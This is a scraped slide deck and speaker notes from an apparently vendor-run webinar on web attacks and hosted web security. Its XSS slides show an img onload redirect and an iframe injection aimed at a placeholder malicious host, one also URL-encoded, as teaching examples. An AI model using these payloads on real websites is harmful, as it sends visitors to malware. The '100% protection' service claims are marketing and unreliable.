SlideShare a Scribd company logo
1 of 27
Anatomy of a Web Attack,[object Object],1,[object Object]
Agenda,[object Object],Challenges Corporation Face ,[object Object],Web Usage Statistics,[object Object],Web Attacks,[object Object],Solving the Problem,[object Object],MessageLabs Services,[object Object]
The Challenge,[object Object],The Acme corporation faces a common problem, they want to allow their users business and reasonable personal web access but they want to make sure that they are protected against the common threats:,[object Object], Productivity,[object Object], Offensive Materials,[object Object], Abuse of resources,[object Object], Malware,[object Object]
Lots of websites,[object Object],Average 2,465 new malware websites per day.,[object Object]
Why malware?,[object Object],Monetize the attack.,[object Object],[object Object]
Steal your credentials  - bank theft / fraud
Steal your data – confidential data / fraud,[object Object]
Getting Web Malware,[object Object],Bad Link,[object Object],postcard.jpg.exe,[object Object]
Advertise It,[object Object],Subvert a legitimate website,[object Object],Adverts,[object Object]
Fake AV Advert,[object Object]
XSS Attack,[object Object],User content,[object Object],No. Your wrong.,[object Object],Duh! Its “you’re”.,[object Object],I agree. <img src=“/images/smiley.gif” ,[object Object],	onload=“document.location=‘http://malicious/’”>,[object Object]
XSS IFrame Attack,[object Object],http://genuine/index.php?search="'>,[object Object],<iframe src="http://malicious“ ,[object Object],height=“100%" width=“100%">,[object Object],</iframe>,[object Object],http://genuine/index.php?search="'>,[object Object],%3C%69%66%72%61%6D%65%20,[object Object],%73%72%63%3D%22%68%74%74,[object Object],%70%3A%2F%2F%6D%61%6C%69,[object Object],%63%69%6F%75%73%201C%20,[object Object],%0A%68%65%69%67%68%74%3D,[object Object],%201C%31%30%30%25%22%20,[object Object],%77%69%64%74%68%3D%201C,[object Object],%31%30%30%25%22%3E%0A%3C,[object Object],%2F%69%66%72%61%6D%65%3E%0A,[object Object]
Web Malware,[object Object],Malware,[object Object],Malicious instructions,[object Object],Browser / JS / Flash / PDF,[object Object],Complete control,[object Object],Victim,[object Object],Bad Guy,[object Object]
Gumblar Lifecycle,[object Object],User visits website with XSS exploit,[object Object],User is forwarded to host serving malware,[object Object],Malware installed (often flash or PDF),[object Object],Malware steals website logins,	forwards to hacker,[object Object],Hacker logs into website, installs XSS exploit,[object Object]
Gumblar Prevalance,[object Object],Up to 60% of all malicious web traffic is Gumblar.,[object Object]
How You Can Protect Yourself,[object Object],15,[object Object]
Controlling the web,[object Object],IT Management should first consider controlling the Web;,[object Object],Policy engine includes:,[object Object],Categorised URL database,[object Object],MIME and file type lists ,[object Object],Time periods,[object Object],User and group based policies,[object Object],Customizable block messages,[object Object],Controls HTTP and HTTPS,[object Object]
Building the policy,[object Object],No access to travel, leisure and sport between 9am and 5pm,[object Object],No access to sex, guns or drugs,[object Object],No access to streaming audio and video (reduce bandwidth),[object Object],Only support can download executables,[object Object]
Monitoring access,[object Object],Dashboard – 1 year of high level information,[object Object],Detailed reports up to 6 months of URL and Malware information,[object Object],Customizable reports in PDF format,[object Object],Scheduled reports sent directly to your inbox,[object Object]
Malware Protection,[object Object],Scans HTTP and FTP/HTTP traffic,[object Object],Multiple signature based AV engines,[object Object],Skeptic technology,[object Object],Customizable block messages,[object Object],Converged analysis,[object Object],No noticeable latency,[object Object]
You have choices for Web Security,[object Object],20,[object Object]
Why use a hosted services over hardware or software?,[object Object]
Why use MessageLabs Services?,[object Object],Best Client and Technical Support ,[object Object],Global Support is 24/7/365 & included with the service,[object Object],Support SLA protects your business,[object Object],Always get a live person who speaks your language,[object Object],Dedicated CSM team,[object Object],Best Services,[object Object],Awarding Winning,[object Object],Analyst approved,[object Object],Backed by strongest SLAs ,[object Object]
Most Robust Global Infrastructure,[object Object],Incorporating 14 data centers spanning four continents,[object Object],Every data center is scalable and secured to the highest standards,[object Object],Clustered high performance servers, each cluster has full redundancy within itself and all other hardware is duplicated,[object Object],23,[object Object]
Best Service Level Agreements,[object Object],Web,[object Object],Anti-Virus Protection  100% protection from known and unknown email viruses,[object Object],Credit is offered if a client infected by a virus,[object Object],Anti-Virus Protection  100% protection against known viruses,[object Object],Credit is offered if a client infected by a virus,[object Object],Email,[object Object],Archiving,[object Object],Latency  Average scanning time of 100% of web content is within 100 milliseconds,[object Object],Credit is offered if latency exceeds 100 milliseconds,[object Object],Virus False Positives  0.0001% FP capture rate,[object Object],Credit is offered if we do not meet this commitment,[object Object],Service Availability  100% uptime,[object Object],Credit is offered if availability falls below 100%,[object Object],Client may terminate if availability falls below 95%,[object Object],Spam Capture Rate  99% capture rate (95% for emails containing Asian characters),[object Object],Credit is offered if we do not meet this commitment,[object Object],Support,[object Object],Service Availability Guarantee 99.9% uptime for archiving network,[object Object],Client may terminate if availability falls below 90%,[object Object],Spam False Positives  0.0003% FP capture rate,[object Object],Credit is offered if we do not meet this commitment,[object Object],Appliance Replacement Guarantee If appliance fails during the warranty period, MessageLabs will repair or replace the appliance within 3 business days at no cost,[object Object],Latency  Average roundtrip time of 100% of email delivered in less than 60 seconds,[object Object],Credit is offered if latency exceeds 1 minute,[object Object],Delivery  100% delivery guarantee,[object Object],Client may terminate if we do not meet this,[object Object],Technical support / Fault Response critical - 95% calls within 2hrs; major - 85% calls within 4hrs; minor - 75% calls within 8hrs,[object Object],Credit is offered if we do not meet this commitment,[object Object],Service Availability  100% uptime,[object Object],Credit is offered if availability falls below 100%,[object Object],Client may terminate if availability falls below 95%,[object Object]
Best Shared Intelligence,[object Object],Accuracy, Reliability & Performance,[object Object],The automatic sharing of knowledge gained in one protocol across all other protocols underpins MessageLabs Converged Threat Analysis. Security solutions that only focus on a single protocol such as email or web, or those that lack integration at the level of threat detection, may not sufficiently protect your business from malware and spyware designed to slip past single protocol security.,[object Object]
Q&A,[object Object],Visit: www.MessageLabs.com,[object Object],Phone: 866.460.0000,[object Object],Email: Lrothman@MessageLabs.com,[object Object],26,[object Object]

More Related Content

What's hot

OWASP Top 10 - 2017 Top 10 web application security risks
OWASP Top 10 - 2017 Top 10 web application security risksOWASP Top 10 - 2017 Top 10 web application security risks
OWASP Top 10 - 2017 Top 10 web application security risksKun-Da Wu
 
OWASP Top 10 - 2017
OWASP Top 10 - 2017OWASP Top 10 - 2017
OWASP Top 10 - 2017HackerOne
 
Passwords are passé. WebAuthn is simpler, stronger and ready to go
Passwords are passé. WebAuthn is simpler, stronger and ready to goPasswords are passé. WebAuthn is simpler, stronger and ready to go
Passwords are passé. WebAuthn is simpler, stronger and ready to goMichael Furman
 
How to Test for The OWASP Top Ten
 How to Test for The OWASP Top Ten How to Test for The OWASP Top Ten
How to Test for The OWASP Top TenSecurity Innovation
 
Owasp 2017 oveview
Owasp 2017   oveviewOwasp 2017   oveview
Owasp 2017 oveviewShreyas N
 
How can you deliver a secure product
How can you deliver a secure productHow can you deliver a secure product
How can you deliver a secure productMichael Furman
 
OWASP Top 10 2017 - New Vulnerabilities
OWASP Top 10 2017 - New VulnerabilitiesOWASP Top 10 2017 - New Vulnerabilities
OWASP Top 10 2017 - New VulnerabilitiesDilum Bandara
 
Owasp top 10 security threats
Owasp top 10 security threatsOwasp top 10 security threats
Owasp top 10 security threatsVishal Kumar
 
Modernizing, Migrating & Mitigating - Moving to Modern Cloud & API Web Apps W...
Modernizing, Migrating & Mitigating - Moving to Modern Cloud & API Web Apps W...Modernizing, Migrating & Mitigating - Moving to Modern Cloud & API Web Apps W...
Modernizing, Migrating & Mitigating - Moving to Modern Cloud & API Web Apps W...Security Innovation
 
The New OWASP Top Ten: Let's Cut to the Chase
The New OWASP Top Ten: Let's Cut to the ChaseThe New OWASP Top Ten: Let's Cut to the Chase
The New OWASP Top Ten: Let's Cut to the ChaseSecurity Innovation
 
Istio Security Overview
Istio Security OverviewIstio Security Overview
Istio Security OverviewMichael Furman
 
OWASP Top 10 2017 rc1 - The Ten Most Critical Web Application Security Risks
OWASP Top 10 2017 rc1 - The Ten Most Critical Web Application Security RisksOWASP Top 10 2017 rc1 - The Ten Most Critical Web Application Security Risks
OWASP Top 10 2017 rc1 - The Ten Most Critical Web Application Security RisksAndre Van Klaveren
 
Introduction To OWASP
Introduction To OWASPIntroduction To OWASP
Introduction To OWASPMarco Morana
 

What's hot (20)

OWASP Top 10 - 2017 Top 10 web application security risks
OWASP Top 10 - 2017 Top 10 web application security risksOWASP Top 10 - 2017 Top 10 web application security risks
OWASP Top 10 - 2017 Top 10 web application security risks
 
OWASP Top 10 - 2017
OWASP Top 10 - 2017OWASP Top 10 - 2017
OWASP Top 10 - 2017
 
Passwords are passé. WebAuthn is simpler, stronger and ready to go
Passwords are passé. WebAuthn is simpler, stronger and ready to goPasswords are passé. WebAuthn is simpler, stronger and ready to go
Passwords are passé. WebAuthn is simpler, stronger and ready to go
 
How to Test for The OWASP Top Ten
 How to Test for The OWASP Top Ten How to Test for The OWASP Top Ten
How to Test for The OWASP Top Ten
 
Owasp 2017 oveview
Owasp 2017   oveviewOwasp 2017   oveview
Owasp 2017 oveview
 
Owasp top 10 2017
Owasp top 10 2017Owasp top 10 2017
Owasp top 10 2017
 
How can you deliver a secure product
How can you deliver a secure productHow can you deliver a secure product
How can you deliver a secure product
 
Web security and OWASP
Web security and OWASPWeb security and OWASP
Web security and OWASP
 
Owasp top 10
Owasp top 10Owasp top 10
Owasp top 10
 
Owasp
Owasp Owasp
Owasp
 
OWASP Top 10 2017 - New Vulnerabilities
OWASP Top 10 2017 - New VulnerabilitiesOWASP Top 10 2017 - New Vulnerabilities
OWASP Top 10 2017 - New Vulnerabilities
 
OWASP Top 10 2017
OWASP Top 10 2017OWASP Top 10 2017
OWASP Top 10 2017
 
Owasp top 10 security threats
Owasp top 10 security threatsOwasp top 10 security threats
Owasp top 10 security threats
 
Owasp Top 10
Owasp Top 10Owasp Top 10
Owasp Top 10
 
Modernizing, Migrating & Mitigating - Moving to Modern Cloud & API Web Apps W...
Modernizing, Migrating & Mitigating - Moving to Modern Cloud & API Web Apps W...Modernizing, Migrating & Mitigating - Moving to Modern Cloud & API Web Apps W...
Modernizing, Migrating & Mitigating - Moving to Modern Cloud & API Web Apps W...
 
Owasp first5 presentation
Owasp first5 presentationOwasp first5 presentation
Owasp first5 presentation
 
The New OWASP Top Ten: Let's Cut to the Chase
The New OWASP Top Ten: Let's Cut to the ChaseThe New OWASP Top Ten: Let's Cut to the Chase
The New OWASP Top Ten: Let's Cut to the Chase
 
Istio Security Overview
Istio Security OverviewIstio Security Overview
Istio Security Overview
 
OWASP Top 10 2017 rc1 - The Ten Most Critical Web Application Security Risks
OWASP Top 10 2017 rc1 - The Ten Most Critical Web Application Security RisksOWASP Top 10 2017 rc1 - The Ten Most Critical Web Application Security Risks
OWASP Top 10 2017 rc1 - The Ten Most Critical Web Application Security Risks
 
Introduction To OWASP
Introduction To OWASPIntroduction To OWASP
Introduction To OWASP
 

Viewers also liked

Web Application Vulnerabilities
Web Application VulnerabilitiesWeb Application Vulnerabilities
Web Application VulnerabilitiesPreetish Panda
 
Lesson 6 web based attacks
Lesson 6 web based attacksLesson 6 web based attacks
Lesson 6 web based attacksFrank Victory
 
Behind The Scenes Of Web Attacks
Behind The Scenes Of Web AttacksBehind The Scenes Of Web Attacks
Behind The Scenes Of Web AttacksMaurizio Abbà
 
Web Attacks - Top threats - 2010
Web Attacks - Top threats - 2010Web Attacks - Top threats - 2010
Web Attacks - Top threats - 2010Shreeraj Shah
 
Top Ten Web Attacks
Top Ten Web Attacks Top Ten Web Attacks
Top Ten Web Attacks Ajay Ohri
 
Trends in Web Attacks
Trends in Web AttacksTrends in Web Attacks
Trends in Web AttacksIWMW
 
Web application attack Presentation
Web application attack PresentationWeb application attack Presentation
Web application attack PresentationKhoa Nguyen
 
Web application attacks
Web application attacksWeb application attacks
Web application attackshruth
 

Viewers also liked (11)

Web Application Vulnerabilities
Web Application VulnerabilitiesWeb Application Vulnerabilities
Web Application Vulnerabilities
 
Lesson 6 web based attacks
Lesson 6 web based attacksLesson 6 web based attacks
Lesson 6 web based attacks
 
Behind The Scenes Of Web Attacks
Behind The Scenes Of Web AttacksBehind The Scenes Of Web Attacks
Behind The Scenes Of Web Attacks
 
Web Attacks - Top threats - 2010
Web Attacks - Top threats - 2010Web Attacks - Top threats - 2010
Web Attacks - Top threats - 2010
 
Top Ten Web Attacks
Top Ten Web Attacks Top Ten Web Attacks
Top Ten Web Attacks
 
Trends in Web Attacks
Trends in Web AttacksTrends in Web Attacks
Trends in Web Attacks
 
Presentation on Web Attacks
Presentation on Web AttacksPresentation on Web Attacks
Presentation on Web Attacks
 
Real web-attack-scenario
Real web-attack-scenarioReal web-attack-scenario
Real web-attack-scenario
 
Web application attack Presentation
Web application attack PresentationWeb application attack Presentation
Web application attack Presentation
 
Hacking Web: Attacks & Tips
Hacking Web: Attacks & TipsHacking Web: Attacks & Tips
Hacking Web: Attacks & Tips
 
Web application attacks
Web application attacksWeb application attacks
Web application attacks
 

Similar to Anatomy Web Attack

Web Security and Network Security
Web Security and Network SecurityWeb Security and Network Security
Web Security and Network Securitycrussell79
 
Secure email gate way
Secure email gate waySecure email gate way
Secure email gate wayvfmindia
 
Keep your Email Secure
Keep your Email SecureKeep your Email Secure
Keep your Email SecureShawn Jordan
 
CIS 2015 Identity and Data Security : Breaking the Boundaries - Nathanael Cof...
CIS 2015 Identity and Data Security : Breaking the Boundaries - Nathanael Cof...CIS 2015 Identity and Data Security : Breaking the Boundaries - Nathanael Cof...
CIS 2015 Identity and Data Security : Breaking the Boundaries - Nathanael Cof...CloudIDSummit
 
Securing Your Small Business Network
Securing Your Small Business NetworkSecuring Your Small Business Network
Securing Your Small Business NetworkAnindita Ghatak
 
Remote Workforces Secure by Barracuda
Remote Workforces Secure by BarracudaRemote Workforces Secure by Barracuda
Remote Workforces Secure by BarracudaPrime Infoserv
 
Information Security Risks - What You Can Do To Help Your Clients Avoid Costl...
Information Security Risks - What You Can Do To Help Your Clients Avoid Costl...Information Security Risks - What You Can Do To Help Your Clients Avoid Costl...
Information Security Risks - What You Can Do To Help Your Clients Avoid Costl...Net at Work
 
Top 10 Azure Security Best Practices (1).pptx
Top 10 Azure Security Best Practices (1).pptxTop 10 Azure Security Best Practices (1).pptx
Top 10 Azure Security Best Practices (1).pptxHichamNiamane1
 
Quick Overview of ClrStream
Quick Overview of ClrStreamQuick Overview of ClrStream
Quick Overview of ClrStreamClrStream
 
How Cloud Email delivers security, reliability, and speed to Indian Oil Corpo...
How Cloud Email delivers security, reliability, and speed to Indian Oil Corpo...How Cloud Email delivers security, reliability, and speed to Indian Oil Corpo...
How Cloud Email delivers security, reliability, and speed to Indian Oil Corpo...Mithi SkyConnect
 
Symantec-CWS_Brochure
Symantec-CWS_BrochureSymantec-CWS_Brochure
Symantec-CWS_BrochureJustyna Majek
 
Mimecast Presentation
Mimecast PresentationMimecast Presentation
Mimecast PresentationMichelle6518
 
Layer7-WebServices-Hacking-and-Hardening.pdf
Layer7-WebServices-Hacking-and-Hardening.pdfLayer7-WebServices-Hacking-and-Hardening.pdf
Layer7-WebServices-Hacking-and-Hardening.pdfdistortdistort
 
Oracle UCM Security: Challenges and Best Practices
Oracle UCM Security: Challenges and Best PracticesOracle UCM Security: Challenges and Best Practices
Oracle UCM Security: Challenges and Best PracticesBrian Huff
 
A Different Approach to Securing Your Cloud Journey
A Different Approach to Securing Your Cloud JourneyA Different Approach to Securing Your Cloud Journey
A Different Approach to Securing Your Cloud JourneyCloudflare
 
Security from the Start: Optimizing Your Acquia Experience with Acquia Cloud...
 Security from the Start: Optimizing Your Acquia Experience with Acquia Cloud... Security from the Start: Optimizing Your Acquia Experience with Acquia Cloud...
Security from the Start: Optimizing Your Acquia Experience with Acquia Cloud...Rachel Wandishin
 
Keeping your business safe online cosy club
Keeping your business safe online cosy clubKeeping your business safe online cosy club
Keeping your business safe online cosy clubGet up to Speed
 
M86 Security apresenta Secure Web Gateway
M86 Security apresenta Secure Web GatewayM86 Security apresenta Secure Web Gateway
M86 Security apresenta Secure Web GatewayINSPIRIT BRASIL
 

Similar to Anatomy Web Attack (20)

Watch guard reputation enabled defense
Watch guard reputation enabled defenseWatch guard reputation enabled defense
Watch guard reputation enabled defense
 
Web Security and Network Security
Web Security and Network SecurityWeb Security and Network Security
Web Security and Network Security
 
Solution Brief
Solution BriefSolution Brief
Solution Brief
 
Secure email gate way
Secure email gate waySecure email gate way
Secure email gate way
 
Keep your Email Secure
Keep your Email SecureKeep your Email Secure
Keep your Email Secure
 
CIS 2015 Identity and Data Security : Breaking the Boundaries - Nathanael Cof...
CIS 2015 Identity and Data Security : Breaking the Boundaries - Nathanael Cof...CIS 2015 Identity and Data Security : Breaking the Boundaries - Nathanael Cof...
CIS 2015 Identity and Data Security : Breaking the Boundaries - Nathanael Cof...
 
Securing Your Small Business Network
Securing Your Small Business NetworkSecuring Your Small Business Network
Securing Your Small Business Network
 
Remote Workforces Secure by Barracuda
Remote Workforces Secure by BarracudaRemote Workforces Secure by Barracuda
Remote Workforces Secure by Barracuda
 
Information Security Risks - What You Can Do To Help Your Clients Avoid Costl...
Information Security Risks - What You Can Do To Help Your Clients Avoid Costl...Information Security Risks - What You Can Do To Help Your Clients Avoid Costl...
Information Security Risks - What You Can Do To Help Your Clients Avoid Costl...
 
Top 10 Azure Security Best Practices (1).pptx
Top 10 Azure Security Best Practices (1).pptxTop 10 Azure Security Best Practices (1).pptx
Top 10 Azure Security Best Practices (1).pptx
 
Quick Overview of ClrStream
Quick Overview of ClrStreamQuick Overview of ClrStream
Quick Overview of ClrStream
 
How Cloud Email delivers security, reliability, and speed to Indian Oil Corpo...
How Cloud Email delivers security, reliability, and speed to Indian Oil Corpo...How Cloud Email delivers security, reliability, and speed to Indian Oil Corpo...
How Cloud Email delivers security, reliability, and speed to Indian Oil Corpo...
 
Symantec-CWS_Brochure
Symantec-CWS_BrochureSymantec-CWS_Brochure
Symantec-CWS_Brochure
 
Mimecast Presentation
Mimecast PresentationMimecast Presentation
Mimecast Presentation
 
Layer7-WebServices-Hacking-and-Hardening.pdf
Layer7-WebServices-Hacking-and-Hardening.pdfLayer7-WebServices-Hacking-and-Hardening.pdf
Layer7-WebServices-Hacking-and-Hardening.pdf
 
Oracle UCM Security: Challenges and Best Practices
Oracle UCM Security: Challenges and Best PracticesOracle UCM Security: Challenges and Best Practices
Oracle UCM Security: Challenges and Best Practices
 
A Different Approach to Securing Your Cloud Journey
A Different Approach to Securing Your Cloud JourneyA Different Approach to Securing Your Cloud Journey
A Different Approach to Securing Your Cloud Journey
 
Security from the Start: Optimizing Your Acquia Experience with Acquia Cloud...
 Security from the Start: Optimizing Your Acquia Experience with Acquia Cloud... Security from the Start: Optimizing Your Acquia Experience with Acquia Cloud...
Security from the Start: Optimizing Your Acquia Experience with Acquia Cloud...
 
Keeping your business safe online cosy club
Keeping your business safe online cosy clubKeeping your business safe online cosy club
Keeping your business safe online cosy club
 
M86 Security apresenta Secure Web Gateway
M86 Security apresenta Secure Web GatewayM86 Security apresenta Secure Web Gateway
M86 Security apresenta Secure Web Gateway
 

Recently uploaded

Cloud Revolution: Exploring the New Wave of Serverless Spatial Data
Cloud Revolution: Exploring the New Wave of Serverless Spatial DataCloud Revolution: Exploring the New Wave of Serverless Spatial Data
Cloud Revolution: Exploring the New Wave of Serverless Spatial DataSafe Software
 
COMPUTER 10: Lesson 7 - File Storage and Online Collaboration
COMPUTER 10: Lesson 7 - File Storage and Online CollaborationCOMPUTER 10: Lesson 7 - File Storage and Online Collaboration
COMPUTER 10: Lesson 7 - File Storage and Online Collaborationbruanjhuli
 
Do we need a new standard for visualizing the invisible?
Do we need a new standard for visualizing the invisible?Do we need a new standard for visualizing the invisible?
Do we need a new standard for visualizing the invisible?SANGHEE SHIN
 
UiPath Studio Web workshop series - Day 6
UiPath Studio Web workshop series - Day 6UiPath Studio Web workshop series - Day 6
UiPath Studio Web workshop series - Day 6DianaGray10
 
Empowering Africa's Next Generation: The AI Leadership Blueprint
Empowering Africa's Next Generation: The AI Leadership BlueprintEmpowering Africa's Next Generation: The AI Leadership Blueprint
Empowering Africa's Next Generation: The AI Leadership BlueprintMahmoud Rabie
 
Videogame localization & technology_ how to enhance the power of translation.pdf
Videogame localization & technology_ how to enhance the power of translation.pdfVideogame localization & technology_ how to enhance the power of translation.pdf
Videogame localization & technology_ how to enhance the power of translation.pdfinfogdgmi
 
Computer 10: Lesson 10 - Online Crimes and Hazards
Computer 10: Lesson 10 - Online Crimes and HazardsComputer 10: Lesson 10 - Online Crimes and Hazards
Computer 10: Lesson 10 - Online Crimes and HazardsSeth Reyes
 
Introduction to Matsuo Laboratory (ENG).pptx
Introduction to Matsuo Laboratory (ENG).pptxIntroduction to Matsuo Laboratory (ENG).pptx
Introduction to Matsuo Laboratory (ENG).pptxMatsuo Lab
 
Anypoint Code Builder , Google Pub sub connector and MuleSoft RPA
Anypoint Code Builder , Google Pub sub connector and MuleSoft RPAAnypoint Code Builder , Google Pub sub connector and MuleSoft RPA
Anypoint Code Builder , Google Pub sub connector and MuleSoft RPAshyamraj55
 
The Data Metaverse: Unpacking the Roles, Use Cases, and Tech Trends in Data a...
The Data Metaverse: Unpacking the Roles, Use Cases, and Tech Trends in Data a...The Data Metaverse: Unpacking the Roles, Use Cases, and Tech Trends in Data a...
The Data Metaverse: Unpacking the Roles, Use Cases, and Tech Trends in Data a...Aggregage
 
OpenShift Commons Paris - Choose Your Own Observability Adventure
OpenShift Commons Paris - Choose Your Own Observability AdventureOpenShift Commons Paris - Choose Your Own Observability Adventure
OpenShift Commons Paris - Choose Your Own Observability AdventureEric D. Schabell
 
Meet the new FSP 3000 M-Flex800™
Meet the new FSP 3000 M-Flex800™Meet the new FSP 3000 M-Flex800™
Meet the new FSP 3000 M-Flex800™Adtran
 
Using IESVE for Loads, Sizing and Heat Pump Modeling to Achieve Decarbonization
Using IESVE for Loads, Sizing and Heat Pump Modeling to Achieve DecarbonizationUsing IESVE for Loads, Sizing and Heat Pump Modeling to Achieve Decarbonization
Using IESVE for Loads, Sizing and Heat Pump Modeling to Achieve DecarbonizationIES VE
 
UiPath Studio Web workshop series - Day 8
UiPath Studio Web workshop series - Day 8UiPath Studio Web workshop series - Day 8
UiPath Studio Web workshop series - Day 8DianaGray10
 
Things you didn't know you can use in your Salesforce
Things you didn't know you can use in your SalesforceThings you didn't know you can use in your Salesforce
Things you didn't know you can use in your SalesforceMartin Humpolec
 
Comparing Sidecar-less Service Mesh from Cilium and Istio
Comparing Sidecar-less Service Mesh from Cilium and IstioComparing Sidecar-less Service Mesh from Cilium and Istio
Comparing Sidecar-less Service Mesh from Cilium and IstioChristian Posta
 
Bird eye's view on Camunda open source ecosystem
Bird eye's view on Camunda open source ecosystemBird eye's view on Camunda open source ecosystem
Bird eye's view on Camunda open source ecosystemAsko Soukka
 
9 Steps For Building Winning Founding Team
9 Steps For Building Winning Founding Team9 Steps For Building Winning Founding Team
9 Steps For Building Winning Founding TeamAdam Moalla
 
KubeConEU24-Monitoring Kubernetes and Cloud Spend with OpenCost
KubeConEU24-Monitoring Kubernetes and Cloud Spend with OpenCostKubeConEU24-Monitoring Kubernetes and Cloud Spend with OpenCost
KubeConEU24-Monitoring Kubernetes and Cloud Spend with OpenCostMatt Ray
 
Connector Corner: Extending LLM automation use cases with UiPath GenAI connec...
Connector Corner: Extending LLM automation use cases with UiPath GenAI connec...Connector Corner: Extending LLM automation use cases with UiPath GenAI connec...
Connector Corner: Extending LLM automation use cases with UiPath GenAI connec...DianaGray10
 

Recently uploaded (20)

Cloud Revolution: Exploring the New Wave of Serverless Spatial Data
Cloud Revolution: Exploring the New Wave of Serverless Spatial DataCloud Revolution: Exploring the New Wave of Serverless Spatial Data
Cloud Revolution: Exploring the New Wave of Serverless Spatial Data
 
COMPUTER 10: Lesson 7 - File Storage and Online Collaboration
COMPUTER 10: Lesson 7 - File Storage and Online CollaborationCOMPUTER 10: Lesson 7 - File Storage and Online Collaboration
COMPUTER 10: Lesson 7 - File Storage and Online Collaboration
 
Do we need a new standard for visualizing the invisible?
Do we need a new standard for visualizing the invisible?Do we need a new standard for visualizing the invisible?
Do we need a new standard for visualizing the invisible?
 
UiPath Studio Web workshop series - Day 6
UiPath Studio Web workshop series - Day 6UiPath Studio Web workshop series - Day 6
UiPath Studio Web workshop series - Day 6
 
Empowering Africa's Next Generation: The AI Leadership Blueprint
Empowering Africa's Next Generation: The AI Leadership BlueprintEmpowering Africa's Next Generation: The AI Leadership Blueprint
Empowering Africa's Next Generation: The AI Leadership Blueprint
 
Videogame localization & technology_ how to enhance the power of translation.pdf
Videogame localization & technology_ how to enhance the power of translation.pdfVideogame localization & technology_ how to enhance the power of translation.pdf
Videogame localization & technology_ how to enhance the power of translation.pdf
 
Computer 10: Lesson 10 - Online Crimes and Hazards
Computer 10: Lesson 10 - Online Crimes and HazardsComputer 10: Lesson 10 - Online Crimes and Hazards
Computer 10: Lesson 10 - Online Crimes and Hazards
 
Introduction to Matsuo Laboratory (ENG).pptx
Introduction to Matsuo Laboratory (ENG).pptxIntroduction to Matsuo Laboratory (ENG).pptx
Introduction to Matsuo Laboratory (ENG).pptx
 
Anypoint Code Builder , Google Pub sub connector and MuleSoft RPA
Anypoint Code Builder , Google Pub sub connector and MuleSoft RPAAnypoint Code Builder , Google Pub sub connector and MuleSoft RPA
Anypoint Code Builder , Google Pub sub connector and MuleSoft RPA
 
The Data Metaverse: Unpacking the Roles, Use Cases, and Tech Trends in Data a...
The Data Metaverse: Unpacking the Roles, Use Cases, and Tech Trends in Data a...The Data Metaverse: Unpacking the Roles, Use Cases, and Tech Trends in Data a...
The Data Metaverse: Unpacking the Roles, Use Cases, and Tech Trends in Data a...
 
OpenShift Commons Paris - Choose Your Own Observability Adventure
OpenShift Commons Paris - Choose Your Own Observability AdventureOpenShift Commons Paris - Choose Your Own Observability Adventure
OpenShift Commons Paris - Choose Your Own Observability Adventure
 
Meet the new FSP 3000 M-Flex800™
Meet the new FSP 3000 M-Flex800™Meet the new FSP 3000 M-Flex800™
Meet the new FSP 3000 M-Flex800™
 
Using IESVE for Loads, Sizing and Heat Pump Modeling to Achieve Decarbonization
Using IESVE for Loads, Sizing and Heat Pump Modeling to Achieve DecarbonizationUsing IESVE for Loads, Sizing and Heat Pump Modeling to Achieve Decarbonization
Using IESVE for Loads, Sizing and Heat Pump Modeling to Achieve Decarbonization
 
UiPath Studio Web workshop series - Day 8
UiPath Studio Web workshop series - Day 8UiPath Studio Web workshop series - Day 8
UiPath Studio Web workshop series - Day 8
 
Things you didn't know you can use in your Salesforce
Things you didn't know you can use in your SalesforceThings you didn't know you can use in your Salesforce
Things you didn't know you can use in your Salesforce
 
Comparing Sidecar-less Service Mesh from Cilium and Istio
Comparing Sidecar-less Service Mesh from Cilium and IstioComparing Sidecar-less Service Mesh from Cilium and Istio
Comparing Sidecar-less Service Mesh from Cilium and Istio
 
Bird eye's view on Camunda open source ecosystem
Bird eye's view on Camunda open source ecosystemBird eye's view on Camunda open source ecosystem
Bird eye's view on Camunda open source ecosystem
 
9 Steps For Building Winning Founding Team
9 Steps For Building Winning Founding Team9 Steps For Building Winning Founding Team
9 Steps For Building Winning Founding Team
 
KubeConEU24-Monitoring Kubernetes and Cloud Spend with OpenCost
KubeConEU24-Monitoring Kubernetes and Cloud Spend with OpenCostKubeConEU24-Monitoring Kubernetes and Cloud Spend with OpenCost
KubeConEU24-Monitoring Kubernetes and Cloud Spend with OpenCost
 
Connector Corner: Extending LLM automation use cases with UiPath GenAI connec...
Connector Corner: Extending LLM automation use cases with UiPath GenAI connec...Connector Corner: Extending LLM automation use cases with UiPath GenAI connec...
Connector Corner: Extending LLM automation use cases with UiPath GenAI connec...
 

Anatomy Web Attack

  • 1.
  • 2.
  • 3.
  • 4.
  • 5.
  • 6. Steal your credentials - bank theft / fraud
  • 7.
  • 8.
  • 9.
  • 10.
  • 11.
  • 12.
  • 13.
  • 14.
  • 15.
  • 16.
  • 17.
  • 18.
  • 19.
  • 20.
  • 21.
  • 22.
  • 23.
  • 24.
  • 25.
  • 26.
  • 27.
  • 28.

Editor's Notes

  1. Kelly: Welcome to today’s session Anatomy of a Web Attack. Today, we will review an increasingly sophisticated and hostile environment that exists in today&apos;s Internet. In the case of those looking to harm your business, you have several things to consider. Our speaker Lee Rothman will walk you through the various types of attacks, the reason we think malware exists through the Web and what you can do to protect your business. Lee Rothman joined Symantec Hosted Services in 2006 as the principal system engineer of North America. Lee joined the engineering team with 10 years of Internet and security experience, specializing in Internetworking. Prior to Symantec Hosted Services, Lee spent several years as a sales engineer for a large integrator and was product marketing manager for a large Fortune 500 company. Lee acts as a product expert in North America and aids the Sales, Product, and Marketing teams. Lee, can you please take us through today’s session?
  2. Today’s agenda is pretty simple. We are going to first go through the business challenges that companies face when it comes to the Web. I’ll then cover some statistics around the Web and how employees are using the Web in your organization. Finally, I will walk through a few examples of how attacks happen through the Internet. Finally, I will give some basic suggestions on how you can solve this problem.
  3. Let’s first explore the business challenge. Disclaimer, Acme is not a real company. In this example, the Acme corporation faces a common problem, they want to allow their users business and reasonable personal web access but they want to make sure that they are protected against the common threats. As a business, Acme is really looking to solve these four issues. Productivity Offensive Materials Abuse of resources MalwareMost companies now face this challenge and are trying to manage this very real issue. Most companies haven’t really put a security issue in place because the security of the Web has not been an issue (or so they think) in their business. However, if we look at the data we can see some really compelling reasons why security for web should be considered.
  4. Now that we know why they do it, what are the ways in which they get introduced to a company? I’ve put these types of attacks into 5 categoriesBad LinksAdvertisingXSSGumblar Web ServicesLet’s explore these categories in-depth.
  5. Second, IT Managers should consider putting policies in place.
  6. Third, IT Managers should consider monitoring their environments.
  7. Lastly, IT Managers should be sure they have a malware protection place that is effective.
  8. It’s important that we give a special thanks to our malware team in particular Martin Lee from our research and response team. Without his help, this webcast would not be possible.